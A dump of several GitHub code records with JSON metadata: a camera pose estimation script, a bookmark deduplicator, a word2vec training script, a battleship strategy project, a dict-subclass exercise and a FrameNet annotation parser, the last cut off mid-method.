parameters = aruco.DetectorParameters_create()\r\n # Find Markers\r\n corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)\r\n corners = np.array(corners)\r\n # Sort the markes based on Id\r\n indices = np.argsort(ids[:,0])\r\n ids_sorted = ids[indices] \r\n corners = corners[indices]\r\n\r\n # Estimate poses\r\n rvecs, tvecs, objPoints= aruco.estimatePoseSingleMarkers(corners, 70, cameraMatrix, distCoeffs)\r\n # Take out one marker Data (pose as Homogenous matrix)\r\n \r\n \r\n marker0idx = 0\r\n markersWithThisId = (ids == marker0idx).sum()\r\n if markersWithThisId < 1:\r\n print(f'Warning: No markers with id {marker0idx} found!')\r\n elif markersWithThisId > 1:\r\n print(f'Warning: There are multiple ({markersWithThisId}) markers \\\r\n with id {marker0idx} !')\r\n\r\n H_marker0 = vec2homo(tvecs[marker0idx], rvecs[marker0idx])\r\n\r\n # Draw the coordinate frame to the image\r\n if drawFrame:\r\n frame1 = aruco.drawAxis(frame1, cameraMatrix, distCoeffs, \r\n rvecs[marker0idx], tvecs[marker0idx] , 35)\r\n \r\n return corners, H_marker0\r\n\r\n\r\n\r\n\r\n# ### --- Load frames and points ---\r\npath = 'RVSeminarAplikacija/twoCameraViews3.npz'\r\ndata = np.load(path) \r\n# Unpack\r\nframe1 = data['frame1']\r\nframe2 = data['frame2']\r\np1 = data['p1']\r\np2 = data['p2']\r\n# cameraMatrix = data['cameraMatrix']\r\nprint('Data loaded.')\r\n\r\n\r\n\r\n# Load camera parameters:\r\ncameraName = 'EriksPhoneCam'\r\nfolderName = 'CameraCalibration/'\r\ncamParamsName = folderName + cameraName + '.npz'\r\ncamParams = np.load(camParamsName) \r\n\r\nretVal = camParams['retVal']\r\ncameraMatrix = camParams['cameraMatrix']\r\ndistCoeffs = camParams['distCoeffs'] \r\nrvecsCalib = camParams['rvecs']\r\ntvecsCalib = camParams['tvecs']\r\n# print(retVal, cameraMatrix, distCoeffs, rvecsCalib, tvecsCalib)\r\nprint('Camera parameters loaded.')\r\n\r\nnp.set_printoptions(precision=3)\r\nnp.set_printoptions(suppress=True)\r\n\r\n\r\n\r\n\r\n# Camera1 position in marker CS\r\ncorners1, H_frame1 = cornerPointsAndH(frame1, markerOfInterest=0, drawFrame=True)\r\nCam1_inM0 = homoInv(H_frame1)\r\nprint('Cam1_inM0 (camera1 in M0 (global CS)):\\n', Cam1_inM0)\r\n\r\n# Camera2 position in marker CS\r\ncorners2, H_frame2 = cornerPointsAndH(frame2, markerOfInterest=0, drawFrame=True)\r\nCam2_inM0 = homoInv(H_frame2)\r\nprint('Cam2_inM0 (camera2 in M0 (global CS)):\\n', Cam2_inM0)\r\n\r\n# Camera2 position in camera1 CS\r\nCam2_inCam1 = np.dot(homoInv(Cam1_inM0), Cam2_inM0)\r\nprint('*** H_markers (Cam2_inCam1 - camera2 in camera1): ***\\n', Cam2_inCam1)\r\n\r\n\r\n\r\n# Show loaded points\r\nfor point in np.int0(p1):\r\n x,y = point.ravel()\r\n cv2.circle(frame1,(x,y),3,(150, 150, 250),-1)\r\n\r\nfor point in np.int0(p2):\r\n x,y = point.ravel()\r\n cv2.circle(frame2,(x,y),3,(150, 150, 250),-1)\r\n\r\n\r\ncorners1 = np.reshape(corners1, (16, 2))\r\ncorners2 = np.reshape(corners2, (16, 2))\r\n\r\n\r\n# Show detected corners\r\nfor point in np.int0(corners1):\r\n x,y = point.ravel()\r\n cv2.circle(frame1,(x,y),3,(250, 150, 50),-1)\r\n\r\nfor point in np.int0(corners2):\r\n x,y = point.ravel()\r\n cv2.circle(frame2,(x,y),3,(250, 150, 50),-1)\r\n\r\n\r\n\r\n\r\n# --------------------- Pose estimation --------------------------\r\np1 = np.squeeze(p1)\r\np2 = np.squeeze(p2)\r\n\r\nE, maskEs = cv2.findEssentialMat(p1, p2, cameraMatrix) \r\nretval, R, t, maskRp = cv2.recoverPose(E, p1, p2, cameraMatrix)\r\n\r\n# Remove 'bad' points:\r\n# print(f'shape p1 before bad point removal: 
{p1.shape}')\r\nidx = np.where(maskEs==1)[0]\r\np1 = p1[idx]\r\np2 = p2[idx]\r\n# print(f'shape p1 after bad point removal: {p1.shape}')\r\n\r\n\r\nR = R.T\r\nt = -t\r\nRabs, tabs = homo2Rt(Cam2_inCam1)\r\n\r\nHe = np.hstack((R,t))\r\nHe = np.vstack((He, [0, 0, 0, 1]))\r\nprint('He:\\n', He)\r\n\r\n\r\n# print('-------------------------------------------------------')\r\n# --- 3D points reconstruction\r\npointsEcorners = points3Dreconstruction(corners1, corners2, R.T, -t, cameraMatrix)\r\npointsEstimated = points3Dreconstruction(p1, p2, R.T, -t, cameraMatrix)\r\n# pointsEstimated = points3Dreconstruction(corners1, corners2, Rabs.T, -tabs, cameraMatrix)\r\n# pointsEstimated = points3Dreconstruction(p1, p2, Rabs.T, -tabs, cameraMatrix)\r\n\r\n# print('pointsEstimated 3D shape:', pointsEstimated.shape)\r\n# print('pointsEstimated 3D:', pointsEstimated)\r\n# print('-------------------------------------------------------')\r\n\r\n\r\n# Mark 'good' points (on the camera images):\r\nfor point in np.int0(p1):\r\n x,y = point.ravel()\r\n cv2.circle(frame1,(x,y),3,(50, 200, 0),-1)\r\n\r\nfor point in np.int0(p2):\r\n x,y = point.ravel()\r\n cv2.circle(frame2,(x,y),3,(50, 200, 0),-1)\r\n\r\n\r\n\r\n# Scale:\r\ncornerDistances = []\r\n# print('Computing distances:')\r\nfor i in range(pointsEcorners.shape[0]):\r\n\r\n c1 = pointsEcorners[i,:3]\r\n if i % 4 == 3:\r\n # take the first corner of current marker\r\n c2 = pointsEcorners[i-3,:3]\r\n else:\r\n # take the next corner (of the same marker)\r\n c2 = pointsEcorners[i+1,:3]\r\n cornerDistances.append(np.linalg.norm(c2 - c1))\r\n\r\ncornerDistances = np.array(cornerDistances)\r\nscaleFactor = 70/np.mean(cornerDistances)\r\n\r\n\r\npointsEcorners *= scaleFactor\r\npointsEstimated *= scaleFactor\r\nt *= scaleFactor\r\n\r\nHe = np.hstack((R,t))\r\nHe = np.vstack((He, [0, 0, 0, 1]))\r\nprint('He (estimated) after scale:\\n', He)\r\n\r\n\r\nprint('He - H_markers:\\n', He-Cam2_inCam1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncv2.imshow('Frame 1', frame1)\r\ncv2.imshow('Frame 2', frame2)\r\n\r\n# cv2.waitKey(0)\r\nplot3D(pointsEstimated, showOrigin=False)\r\nplot3D(pointsEcorners, showOrigin=False)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"plerik/RV-cameraLocalization","sub_path":"RVSeminarAplikacija/T05_recoverPoseRealImages.py","file_name":"T05_recoverPoseRealImages.py","file_ext":"py","file_size_in_byte":6120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32671106446","text":"# opens a netscape bookmark file (format that chrome uses) bookmarks.html, assumes one line = 1 bookmark, and removes any duplicate urls, outputting to bookmarksout.html\n\nimport re\n\n\ndef main():\n with open('bookmarks.html', encoding='utf8') as infile:\n urlset = set()\n linelist = []\n urlre = re.compile(\n r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')\n for line in infile:\n finds = urlre.findall(line)\n if finds:\n found = False\n for find in set(finds):\n find = find.replace(\n 'http://', '').replace('https://', '').strip()\n if find in urlset:\n found = True\n print(find)\n else:\n urlset.add(find)\n if not found:\n linelist.append(line)\n else:\n linelist.append(line)\n with open('bookmarksout.html', 'w', encoding='utf8') as outfile:\n outfile.writelines(linelist)\n\n\nif __name__ == '__main__':\n 
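# (editor note) URL schemes are stripped before comparison above, so 'http://a/x'\n    # and 'https://a/x' collapse into one bookmark; other variants (e.g. trailing\n    # slashes) are still treated as distinct.\n    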
main()\n","repo_name":"johnpm-12/bookmark-deduplicator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"10469266761","text":"import os\nimport gzip\nfrom gensim.models import Word2Vec\nfrom gensim.models.word2vec import LineSentence\n\n\nclass MySentences(object):\n def __init__(self, dirname):\n self.dirname = dirname\n\n def __iter__(self):\n for fname in os.listdir(self.dirname):\n for line in open(os.path.join(self.dirname, fname)):\n yield line.split()\n\ndef read_input(input_file):\n documents = []\n \"\"\"This method reads the input file which is in gzip format\"\"\"\n\n print(\"reading file {0}...this may take a while\".format(input_file))\n with gzip.open(input_file, 'rb') as f:\n for i, line in enumerate(f):\n\n if (i % 10000 == 0):\n print(\"read {0} reviews\".format(i))\n # do some pre-processing and return list of words for each review\n # text\n documents.append(line)\n return documents\n\nsentences = MySentences('/home/jessica/Documentos/UFSCar/Pesquisa/Projeto/sense2vec-master/bin/corpora/corpora/corpora_tokenized') # a memory-friendly iterator\n#documents = read_input('/home/jessica/Documentos/UFSCar/Pesquisa/Projeto/sense2vec-master/bin/corpora/corpora/corpora_tokenized/corpora_tokenized.tar.gz')\nprint('terminou corpus')\n#sg=1: skigram\n#sg=0: cbow\nmodel = Word2Vec(sentences, sg=1, size=300, window=5, min_count=10)\nprint('finish train')\nmodel.init_sims(replace=True)\nmodel.wv.save_word2vec_format('/home/jessica/Documentos/UFSCar/Pesquisa/Projeto/portuguese_word_embeddings/word2vec/word2vec_s300_ptbr_sg.txt', binary=False)\nprint('finish')","repo_name":"techthiyanes/sense-embeddings-pt","sub_path":"baselines/word2vec/word2vec_train.py","file_name":"word2vec_train.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34009107132","text":"#-*- coding: utf-8 -*-\n\nimport numpy as np\nimport random\nimport matplotlib.pyplot as pt\n\n#-------------------------------------------------------------\n# FONCTION\n#-------------------------------------------------------------\ndef liste_bateaux():\n L = []\n L.append(Bateau(\"porte avion\",1,5))\n L.append(Bateau(\"croiseur\",2,4))\n L.append(Bateau(\"contre-torpilleur\", 3,3))\n L.append(Bateau(\"sous-marin\", 4,3))\n L.append(Bateau(\"torpilleur\",5,2))\n return L\n \ndef genere_grille(taille=10):\n g = Grille(taille)\n L = liste_bateaux()\n for b in L:\n g.place_alea(b)\n return g\n \n#Partie Combinatoire du jeu\ndef nb_facon_grille(G,b):\n #Attention la fonction necessite python 3 sinon utiliser les sets\n cpt = 0\n direction = ['h','v']\n for i in range(0,G.taille):\n for j in range(0,G.taille):\n for d in direction:\n if G.peut_placer(b,(i,j),d):\n cpt += 1\n return cpt\n\ndef nb_place_kBateauRec(G,L):\n #on fixe recursivement les differents bateaux\n nbgrille = 0\n if len(L) == 1:\n #On calcule le nombre de facon de placer le dernier bateau\n return nb_facon_grille(G,L[0])\n else:\n direction = ['h','v']\n for i in range(0,G.taille):\n for j in range(0,G.taille):\n for d in direction:\n if G.peut_placer(L[0],(i,j),d):\n G.place(L[0],(i,j),d)\n nbgrille += nb_place_kBateauRec(G,L[1:])\n G.enleve(L[0],(i,j),d)\n return nbgrille\n\n\n#APPROXIMATION A FAIRE (TOUT DOUX)>.<\n\ndef nb_place_kBateauRec_Memoisation(G,L,dico):\n #apparament comme G est un objet statique ne marche pas\n 
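# NOTE (editor): numpy arrays and Python lists are unhashable, so the memo key\n    # below is built from matrice.tobytes() plus a tuple of the remaining ship sizes.\n    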
TailleBateau = []\n    for i in L:\n        TailleBateau.append(i.taille)\n    cle = (G.matrice.tobytes(), tuple(TailleBateau))# hashable key (bytes + tuple)\n    if cle in dico:\n        return dico[cle]\n    nbgrille = 0\n    if len(L) == 1:\n        #On calcule le nombre de facon de placer le dernier bateau\n        n = nb_facon_grille(G,L[0])\n        dico[cle] = n\n        return n\n    else:\n        direction = ['h','v']\n        for i in range(0,G.taille):\n            for j in range(0,G.taille):\n                for d in direction:\n                    if G.peut_placer(L[0],(i,j),d):\n                        G.place(L[0],(i,j),d)\n                        nbgrille += nb_place_kBateauRec_Memoisation(G,L[1:],dico)# recurse into the memoised version, with G itself (not G.matrice)\n                        G.enleve(L[0],(i,j),d)\n        dico[cle] = nbgrille\n        return nbgrille\n\ndef genere_grille_egale(G):\n    cpt = 1\n    Galea = genere_grille(G.taille)\n    while Galea != G:\n        cpt += 1\n        Galea = genere_grille(G.taille)\n    return cpt\n\n#-----------------------------------------------\n# CLASSES\n#-----------------------------------------------\n\nclass Grille(object):\n    def __init__(self, taille=10):\n        self.taille = taille\n        self.matrice = np.zeros((taille,taille))\n\n    def __repr__(self):\n        return \"Grille : \\n {}\".format(self.matrice)\n\n    def __eq__(self, grilleB):\n        for i in range(grilleB.taille):\n            for j in range(grilleB.taille):\n                if grilleB.matrice[i,j] != self.matrice[i,j]:\n                    return False\n        return True\n    \n\n    def show(self,title=\"Bataille navale TAVU\"):\n        pt.imshow(self.matrice, interpolation=\"nearest\")\n        pt.title(title)\n        pt.show()\n\n    def peut_placer(self,bateau, position, direction):\n        \n        for i in range(bateau.taille):\n            if (direction == 'h'):\n                x = position[0] + i\n                y = position[1]\n            else:\n                x = position[0]\n                y = position[1] + i\n            if x >= self.taille or y >= self.taille or x < 0 or y < 0:\n                return False\n            if self.matrice[x,y] != 0:\n                return False\n        return True\n\n    def place(self,bateau, position, direction):\n        #Attention le bateau est toujours placer vers la droite ou le bas par convention\n        if not(self.peut_placer(bateau, position , direction)):\n            b = False\n            # print(\"impossible de placer le bateau renvoi l'ancienne grille\")\n        else:\n            for i in range(bateau.taille):\n                if (direction == 'h'):\n                    x = position[0] + i\n                    y = position[1]\n                else:\n                    x = position[0]\n                    y = position[1] + i\n                self.matrice[x,y] = bateau.idB\n\n    def place_alea(self,bateau):\n        x = random.randint(0,self.taille-1)\n        y = random.randint(0,self.taille-1)\n        direction = ['h','v']\n        indDir = direction[random.randint(0,1)]\n        while self.peut_placer(bateau,(x,y),indDir) == False:\n            x = random.randint(0,self.taille-1)\n            y = random.randint(0,self.taille-1)\n            indDir = direction[random.randint(0,1)]\n        return self.place(bateau,(x,y), indDir)\n\n    def enleve(self,bateau, position, direction):\n        for i in range(bateau.taille):\n            if (direction == 'h'):\n                x = position[0] + i\n                y = position[1]\n            else:\n                x = position[0]\n                y = position[1] + i\n            self.matrice[x,y] = 0\n\n\nclass Bateau(object):\n    def __init__(self,nom=\"RAOUL\",idB=1,taille=1):\n        self.taille = taille\n        self.nom = nom\n        self.idB = idB\n\n    def __repr__(self):\n        return \"nom : {} , taille : {}, id : {}\".format(self.nom, self.taille, self.idB)\n\nclass Joueur(object):\n    def __init__(self,nom=\"J1\",taille=10, ListeBateauAdv=liste_bateaux()):\n        \"\"\"Correspond a un joueur de bataille navale, possede une Grille et une Grille remplis de : 0 si la case non exploré, -1 si le coup a raté et 1 si il a touché un bateau\"\"\"\n        self.nom = nom\n        self.taille = taille\n        self.MaGrille = genere_grille(taille)\n        self.GrilleAdv = Grille()\n        self.ListeBateauAdv = ListeBateauAdv\n        self.ListeBateauNonCouler = ListeBateauAdv[::]\n        self.GrilleProba = Grille()\n\n    def 
Tir(self,Adv,i,j):\n \"\"\" Grille,int,int -> met a jour GrilleAdv\"\"\" \n if Adv.matrice[(i,j)] == 0:\n #aucun bateau n'a ete touché\n self.GrilleAdv.matrice[(i,j)] = -1\n return False\n else:\n self.GrilleAdv.matrice[(i,j)] = 1\n return True\n\n def Aleatoire(self,Adv):\n \"\"\" Grille -> (boolean, int, int) \n Appelle la fonction Tir\"\"\"\n x = random.randint(0,Adv.taille-1)\n y = random.randint(0,Adv.taille-1)\n #si la case n'a pas encore été exploré\n while(self.GrilleAdv.matrice[(x,y)] != 0):\n x = random.randint(0,Adv.taille-1)\n y = random.randint(0,Adv.taille-1)\n #print(\"(x,y) : ({},{})\".format(x,y))\n return (self.Tir(Adv,x,y),x,y)\n\n def Coup_Cible(self,Adv,x,y):\n #on peut ameliorer la fonction car si il trouve a gauche chercher seulement a droite apres et inversement de meme pour haut et bas\n cpt = 0\n curseur = 1\n #explore a droite\n while x+curseur < Adv.taille and self.Tir(Adv,x+curseur,y):\n curseur += 1\n cpt += 1\n curseur = 0\n #gauche\n while x-curseur >= 0 and self.Tir(Adv,x-curseur,y):\n curseur += 1\n cpt += 1\n curseur = 0\n #bas\n while y+curseur < Adv.taille and self.Tir(Adv,x,y+curseur):\n curseur += 1\n cpt += 1\n curseur = 0\n #haut\n while y-curseur >= 0 and self.Tir(Adv,x,y-curseur):\n curseur += 1\n cpt += 1\n curseur = 0\n return cpt\n \n \n def BateauCouler(self,Adv,idBateau):\n for x in range(Adv.taille):\n for y in range(Adv.taille):\n if Adv.matrice[(x,y)] == idBateau and self.GrilleAdv.matrice[(x,y)] != 1:\n return False\n return True\n\n def ResteBateau(self,Adv):\n for bateau in self.ListeBateauAdv:\n if not(self.BateauCouler(Adv,bateau.idB)):\n return True\n return False\n\n def ActualiseBateaucouler(self,Adv):\n b = True\n for bateau in self.ListeBateauAdv:\n if self.BateauCouler(Adv,bateau.idB) and bateau in self.ListeBateauNonCouler:\n self.ListeBateauNonCouler.remove(bateau)\n #print(\"bateau restant : \",self.ListeBateauNonCouler)\n \n\n def StrategieAleatoire(self,Adv):\n cpt = 0\n while self.ResteBateau(Adv):\n self.Aleatoire(Adv)\n cpt += 1\n return cpt\n\n def StrategieHeuristique(self,Adv):\n cpt = 0\n while self.ResteBateau(Adv):\n (b,i,j) = self.Aleatoire(Adv)\n cpt += 1\n #tant qu'il n'a pas touché une case\n while b != True:\n #La fonction aleatoire tire renvoi un boolean et la case\n (b,i,j) = self.Aleatoire(Adv)\n cpt += 1\n print(\"entrer coup cible : ({},{})\".format(i,j))\n cpt += self.Coup_Cible(Adv,i,j)\n return cpt\n\n def peut_placer_proba(self,bateau, position, direction):\n for i in range(bateau.taille):\n if (direction == 'h'):\n x = position[0] + i\n y = position[1]\n else:\n x = position[0]\n y = position[1] + i\n if x >= self.GrilleAdv.taille or y >= self.GrilleAdv.taille or x < 0 or y < 0:\n return False\n if self.GrilleAdv.matrice[x,y] == -1:\n return False\n return True\n \n def PossibiliteBateauSurCase(self,b,x,y):\n \"\"\" Retourne si le bateau b peut être sur la case x,y en fonction des cases explorées\n amelioration possible\"\"\"\n\n nb = 0\n #probleme car il y a des cas ou on peux placer le bateau et la matrice de probab est vide\n for i in range(b.taille,0,-1):\n if self.peut_placer_proba(b,(x-i,y),'h'):\n nb += 1\n if self.peut_placer_proba(b,(x,y-i),'v'):\n nb += 1\n return nb\n\n\n def MatriceProba(self, b):\n \"\"\" Renvoie un tuple (b, GrilleProba) avec b = false si on peut placer le bateau nule part\"\"\" \n GrilleProba = Grille()\n cpt = 0\n somme = 0\n #on calcule le nombre de position possible\n for x in range(self.GrilleAdv.taille):\n for y in range(self.GrilleAdv.taille):\n cpt += 
self.PossibiliteBateauSurCase(b,x,y)\n if cpt == 0:\n return (False, GrilleProba)\n #on actualise la matrice\n for x in range(self.GrilleAdv.taille):\n for y in range(self.GrilleAdv.taille):\n nb = (float)(self.PossibiliteBateauSurCase(b,x,y))\n somme += nb/cpt\n GrilleProba.matrice[(x,y)] = nb/cpt\n #print(\"la somme des probabilité pour le bateau {} est : {}\".format(b,somme))\n return (True, GrilleProba)\n \n def UpdateGrilleProba(self):\n cpt = 0\n debug = True\n self.GrilleProba.matrice = np.zeros((self.GrilleProba.taille,self.GrilleProba.taille))\n #probleme : on regarde encore les bateaux qui ont été coulé, aussi on a des fois ou on actualise pas la matrice\n if self.ListeBateauNonCouler == []:\n return debug\n for b in self.ListeBateauNonCouler:\n #si on peut placer le bateau\n if self.MatriceProba(b)[0]:\n self.GrilleProba.matrice = np.add(self.GrilleProba.matrice, self.MatriceProba(b)[1].matrice)\n debug = False\n #print(\"le bateau {} a une position possible sur la grille\".format(b))\n return debug\n\n def StrategieProbaSimple(self,Adv):\n \"\"\" La strategie est moins efficace que heuristique\"\"\"\n cpt = 0\n while self.ResteBateau(Adv):\n maxPb = 0\n xMax = 0\n yMax = 0\n #au bout d'un moment update grille proba ne s'actualise pas\n self.UpdateGrilleProba()\n for x in range(self.GrilleProba.taille):\n for y in range(self.GrilleProba.taille):\n #on verifie que la case n'a pas été deja exploré\n if ((self.GrilleProba.matrice[(x,y)] >= maxPb) and (self.GrilleAdv.matrice[(x,y)] == 0)):\n #print(\"point de la grille : \",self.GrilleAdv.matrice[(x,y)])\n #print(\"valeur de verité : \",self.GrilleAdv.matrice[(x,y)] == 0)\n maxPb = self.GrilleProba.matrice[(x,y)]\n xMax = x\n yMax = y\n #print(self.GrilleProba.matrice)\n self.Tir(Adv,xMax,yMax)\n print(\"tire sur la case ({},{})\".format(xMax,yMax))\n self.ActualiseBateaucouler(Adv)\n cpt += 1\n self.UpdateGrilleProba()\n return cpt\n\n def StrategieProbaEtHeuristique(self,Adv):\n \"\"\" Marche mal ne pas utiliser\"\"\"\n cpt = 0\n b = False\n while self.ResteBateau(Adv):\n while b != True:\n maxPb = 0\n xMax = 0\n yMax = 0\n self.UpdateGrilleProba()\n for x in range(self.GrilleProba.taille):\n for y in range(self.GrilleProba.taille):\n #on verifie que la case n'a pas été deja exploré\n if ((self.GrilleProba.matrice[(x,y)] >= maxPb) and (self.GrilleAdv.matrice[(x,y)] == 0)):\n maxPb = self.GrilleProba.matrice[(x,y)]\n xMax = x\n yMax = y\n b = self.Tir(Adv,xMax,yMax)\n print(\"Tir en ({},{})\".format(xMax,yMax))\n cpt += 1\n if not(self.ResteBateau(Adv)):\n return cpt\n print(\"Entrer Coup_Cible({},{})\".format(xMax,yMax))\n cpt += self.Coup_Cible(Adv,xMax,yMax)\n b = False\n return cpt\n\n# if __name__ == \"__main__\":\n#g = genere_grille(4)\n#g.show()\ng2 = Grille(3)\nL = liste_bateaux()\ntest = []\ntest.append(L[-2])\ntest.append(L[-2])\ntest.append(L[-2])\n\nprint(test)\nprint(\"version recursive : \")\nRec = nb_place_kBateauRec(g2,test)\nprint(Rec)\ndico = dict()\n#nb = genere_grille_egale(g)\n#print(\"Nombre de tentative avant d'obtenir la meme grille : \",nb)\n\nj1 = Joueur()\nadv = genere_grille()\nprint(adv)\nn = j1.StrategieHeuristique(adv)\nprint(\"nombre de coup : \",n)\nprint(\"matrice probabiliste :\",j1.GrilleProba.matrice)\nj1.GrilleAdv.show(\"matrice d'exploration\")\nadv.show(\"matrice de 
l'adversaire\")\n","repo_name":"lucas-becirspahic/Stat","sub_path":"Projet1/projet.py","file_name":"projet.py","file_ext":"py","file_size_in_byte":14757,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36143038330","text":"class MyDict(dict):\n    def get(self, key):\n        if key in self:\n            return self[key]\n        else:\n            return 0\n\n\ndict_1 = {'0': '00', '1': '11', '2': '22'}\n\nprint(dict_1.get('1'))\nprint(dict_1.get('4'))\n\ndict_2 = MyDict()\ndict_2['0'] = '000'\ndict_2['1'] = '111'\n\nprint(dict_2.get('1'))\nprint(dict_2.get('4'))\n\n# I don't understand how to fix the get method so that it returns the number 0 by default instead of None.\n# As I understand it, the class MyDict(dict) has to inherit from the dict class, which has the get method that needs\n# to be overridden. But the only code I can see is this\n\n# class dict(object):\n#     def get(self, *args, **kwargs): # real signature unknown\n#         \"\"\" Return the value for key if key is in the dictionary, else default. \"\"\"\n#         pass\n# where can I find the code of the get method that has to be overridden? Or should the solution be different?\n\n# the MyDict(dict) approach is correct, and the get method has to be defined in that class.\n# The dict object itself does not need to be changed.\n\n# accepted!\n","repo_name":"MikhailRyskin/Lessons","sub_path":"Module25/03_my_dict/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8925967955","text":"\"\"\"\nObjectification: This file tries to bring some order to the functions and to the Main, to clarify the structure of the code (by moving to OOP).\n\"\"\"\nimport re\n\nclass structure():\n    \"\"\"\n    This class represents a general structure, sentences or substrings of the sentence\n    It is made to unify our way to select the main node, whether it is a sentence, or simply a span.\n    It will have the following attributes:\n    - range: a range of values for characters. ( I.e. (0, end of sentence) for a sentence, or the span of the cluster for a cluster .\n    - annotations: a (sub)set of annotations\n    - main : the most prominent node, by semantics, or in last resort by syntax.\n    - clusterdict: a dictionary of clusters inside the structure.\n    - allspans: the list of all spans present inside the annotation ( mainly present to generalize the cluster function)\n    - subclusters: a set oc\n    \"\"\"\n    def selectMain(self):\n        \"\"\"\n        This function selects the main element from the structure, assuming that everything has been cleared.\n        \"\"\"\n        pass\n    def extract(self):\n        \"\"\"\n        This function extracts all spans and \n        \"\"\"\n        pass\n\n\nclass sentence(structure):\n    \"\"\"\n    This class is a sentence.\n    \"\"\"\n    #attributes:\n    \"\"\"\n    As attributes, we will have the set of annotated terms and the text\n    - lu: set of LU objects\n    - id: its id.\n    - texte: the utterance\n    - annotations: the set of annotated terms\n    - lemmas : dict [tuple, lemma ]\n    - redirections: dict [tuple, tuple]\n    - affined: bool ( whether the object has been cleaned)\n    - rel_ant: dict ( rel:ant -> per span)\n    - allspans ( useful for our clusters later on... )\n    \"\"\"\n
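    # (editor sketch) intended flow, with 'AS' and 'prefix' as hypothetical\n    # ElementTree inputs from the caller:\n    #   s = sentence(); s.parse_from_xml(AS, prefix); s.lemmatiser()\n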
    text=str()\n\n    #methods:\n    \"\"\"\n    methods:\n    - parse_from_xml(): parses the xml, and returns the [raw] annotations\n    - affine(): takes the raw annotations and produces a cleaner version <- the most complex method.\n    - to_mate(): returns a string in Mate format\n    \"\"\"\n    def parse_from_xml(self, AS, prefix):\n        \"\"\"\n        This function takes as an input the xml structure and updates every field according to the annotation, without further treatment.\n        Input:\n        AS : an XML.etree.elementTree object (annotation set)\n        prefix: a constant string for parsing the xml, using Etree.\n        Output: none, updates the object.\n        \"\"\"\n        self.text=AS.find(prefix+'text').text# we update the text string.\n        annotations=AS.findall(prefix+'annotationSet[@frameName]')\n        self.annotations=set()# sets, not dicts: we only ever .add() to these\n        self.allspans=set()\n        toreverse=set()# 'head' relations to reverse once every LU exists\n        self.rel_ant=set()\n        for lu in annotations:\n            span=(int(lu.find('.//'+prefix+\"label[@name='Target']\").attrib['start']), int(lu.find('.//'+prefix+\"label[@name='Target']\").attrib['end']))# we select the span of the target; offsets cast to int so spans can index self.text later\n            lexical_unit=LU(lemma=lu.attrib['luName'], frame=lu.attrib['frameName'], lu_id=lu.attrib['ID'], span=span) # we build the lexical unit\n            self.allspans.add(span) # update the list of spans\n            semannots=lu.findall('.//'+prefix+\"layer[@name='FE']/\"+prefix+'label[@name]')# select the list of semantics annotations\n            for element in semannots:\n                if 'start' in element.attrib: # the semantic frames that are not a Null instanciation\n                    span=(int(element.attrib['start']), int(element.attrib['end']))\n                    self.allspans.add(span)# we add the span to the list of spans\n                    lexical_unit.add_semantics(span, element.attrib['name'])# the lexical_unit's annotation is updated.\n                else:\n                    lexical_unit.add_semantics(element.attrib['itype'], element.attrib['name'])\n            syntannots= lu.findall('.//'+prefix+\"layer[@name='GF']/\"+prefix+'label[@name]')\n            for element in syntannots:\n                if element.attrib['name']!='head':# Element objects are read through .attrib\n                    lexical_unit.add_syntax((int(element.attrib['start']), int(element.attrib['end'])), element.attrib['name'] )\n                else:\n                    toreverse.add( ((int(element.attrib['start']), int(element.attrib['end'])), (int(lu.find('.//'+prefix+\"label[@name='Target']\").attrib['start']), int(lu.find('.//'+prefix+\"label[@name='Target']\").attrib['end']))) )# set.add takes a single (head span, target span) tuple\n            rel_annots= lu.findall('.//'+prefix+\"layer[@name='Other']/\"+prefix+'label[@name]')\n            for element in rel_annots:\n                self.rel_ant.add((int(element.attrib['start']), int(element.attrib['end']), element.attrib['name']))\n\n            self.annotations.add(lexical_unit)# we add the lexical unit in our structure.\n        for element in toreverse: #iterating over every 'head' GF, and cleaning it\n            i=False# an indicator whether we have to create the LU manually\n            for elt in self.annotations:# our LUs, not the raw xml elements\n                if elt.span==element[0]:\n                    elt.add_syntax(element[1], 'rhead')# updating the syntax\n                    i=True\n                    break\n            if i==False:# if no element can be updated, we simply add an Ad Hoc LU in our annotations.\n                self.annotations.add(LU(span=element[0], syntax={(element[1],'rhead')}))\n\n    # def get_main(self): MOVED TO STRUCTURE CLASS\n    # \"\"\"\n    # This function will return the main LU from the set of annotations\n    # \"\"\"\n    # pass\n\n    # def resolve_clusters(self): MOVED TO STRUCTURE CLASS\n    # \"\"\"\n    # This function will take a cluster, and return its head\n    # \"\"\"\n    # pass\n\n
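    # (editor note) redirect_cluster rewrites alias spans to their canonical span in\n    # both the syntax and semantics tuple sets; e.g. (hypothetical spans)\n    #   s.redirect_cluster({(12, 15): (3, 7)})\n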
    def redirect_cluster(self, redirectionDict):\n        \"\"\"\n        this function takes the redirectionDict, and scans through all LUs to redirect accordingly.\n        \"\"\"\n        for lu in self.annotations:\n            synchange=set()\n            for element in lu.syntax:\n                if element[0] in redirectionDict.keys():\n                    synchange.add((element[0], redirectionDict[element[0]], element[1]))\n            for element in synchange:\n                lu.remove_syntax(element[0])\n                lu.add_syntax(element[1], element[2])# add_syntax takes (span, role), not a single tuple\n            semchange=set()\n            for element in lu.semantics:\n                if element[0] in redirectionDict.keys():\n                    semchange.add((element[0], redirectionDict[element[0]], element[1]))\n            for element in semchange:\n                lu.remove_semantics(element[0])\n                lu.add_semantics(element[1],element[2])\n    def lemmatiser(self):\n        \"\"\"\n        This function will first build a dictionary of all the lemmas, and then transform the LUs accordingly\n        First step: extract lemmas\n        \"\"\"\n        lemmas=dict()\n        for lu in self.annotations: # this extracts the lemmas from the annotations( 1st pass)\n            if lu.lemma not in lemmas.values():\n                